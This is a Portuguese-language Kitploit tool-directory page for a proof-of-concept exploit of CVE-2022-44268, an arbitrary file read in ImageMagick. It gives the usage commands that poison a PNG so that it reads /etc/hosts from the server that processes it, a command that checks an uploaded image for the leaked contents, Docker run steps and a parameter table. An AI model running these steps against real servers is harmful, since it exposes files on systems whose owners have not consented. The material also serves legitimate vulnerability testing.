Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/kljunowsky/cve-2022-44268
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

CVE-2022-44268 ImageMagick Leitura Arbitrária de Arquivos - Exploit de Prova de Conceito

Ver Repositório
278há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 Leitura Arbitrária de Arquivos no ImageMagick - Prova de Conceito de exploit

Vídeo 📼

https://youtu.be/quKxwNAMBIA

Uso 🛠

Envenenar a imagem ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Faça upload da imagem PNG envenenada.

Verifique se o exploit foi bem-sucedido 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Executando com Docker 🐳

Construir

root@kitploit:~
docker build -t cve-2022-44268 .

Executar

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Parâmetros 🧰

Contato📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

Apenas para fins educacionais e não pode ser usado para violação da lei ou ganho pessoal.

O autor deste projeto não se responsabiliza por qualquer dano possível causado pelos materiais deste projeto.

Mais detalhes: https://www.metabaseq.com/imagemagick-zero-days/

Baixar ferramenta
ParâmetroDescriçãoTipo
--urlA URL da imagem PNG enviadaString
--imageArquivo PNG de entradaArquivo
--outputArquivo PNG de saídaArquivo
--file-to-readArquivo a ser lido do host vulnerávelString